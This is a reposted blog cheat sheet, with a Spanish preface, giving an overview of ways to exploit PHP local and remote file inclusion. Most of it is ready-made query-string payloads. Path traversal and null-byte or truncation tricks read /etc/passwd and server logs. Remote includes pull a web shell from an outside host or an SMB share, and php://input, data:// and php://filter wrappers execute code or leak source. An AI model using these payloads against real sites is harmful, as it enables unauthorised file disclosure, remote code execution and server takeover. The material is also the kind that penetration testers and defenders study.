Exploiting PHP File Inclusion – Overview

Para ver mejor la forma de explotación remitir a la fuente.

Recently I see a lot of questions regarding PHP File Inclusions and the possibilities you have. So I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like it to have them summed up at one place.

Basic Local File Inclusion:

1	include("inc/" . $_GET['file']); ?>

• Including files in the same directory:
  ?file=.htaccess
• Path Traversal:
  ?file=../../../../../../../../../var/lib/locate.db
  (this file is very interesting because it lets you search the filesystem, other files)
• Including injected PHP code:
  ?file=../../../../../../../../../var/log/apache/error.log
  
  Tricks:
  
  • list of possible Apache dirs
  • include access log from file descriptor /proc/self/fd/XX
  • include email log files
  • include ssh auth.log
  • abuse avatar/image/attachment file uploads
  • include session files
  • include PHP’s temporarily uploaded files
  • If you additionally have a phpinfo() output, read here.
  Limited Local File Inclusion:
  

  1	include("inc/" . $_GET['file'] . ".htm"); ?>

  • Null Byte Injection:
    ?file=../../../../../../../../../etc/passwd
    (requires magic_quotes_gpc=off)
  • Directory Listing with Null Byte Injection:
    ?file=../../../../../../../../../var/www/accounts/
    (UFS filesystem only, requires magic_quotes_gpc=off, more details here)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
    (more details see here and here)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd……………. …
    (Windows only, more details here)
  • Reverse Path Truncation:
    ?file=../../../../ [...] ../../../../../etc/passwd
    (more details here)
  Basic Remote File Inclusion
  

  1	include($_GET['file']); ?>

  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using PHP stream php://input:
    ?file=php://input
    (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
  • Using PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source because it wont get evaluated in base64. More details here and here)
    
  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (requires allow_url_include=On)
  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (makes sense if firewalled or only whitelisted domains allowed)
  Limited Remote File Inclusion
  

  1	include($_GET['file'] . ".htm"); ?>

  • ?file=http://websec.wordpress.com/shell
  • ?file=http://websec.wordpress.com/shell.txt?
  • ?file=http://websec.wordpress.com/shell.txt%23
  (requires allow_url_fopen=On and allow_url_include=On)
  
  • ?file=\\evilshare\shell.php
  (bypasses allow_url_fopen=Off)
  Static Remote File Inclusion:
  

  1	include("http://192.168.1.10/config.php"); ?>

  • Man In The Middle
    (lame indeed, but often forgotten)
  Filter evasion
  
  • Access files with wildcards (read more here)
  Of course you can combine all the tricks. If you are aware of any other or interesting files to include please leave a comment and I’ll add them.

Fuente: http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

Links de interés:

http://projects.webappsec.org/w/page/13246949/Null%20Byte%20Injection
http://www.theprohack.com/2009/07/null-byte-hack.html
http://hakipedia.com/index.php/Poison_Null_Byte
https://www.owasp.org/index.php/Unrestricted_File_Upload --Completo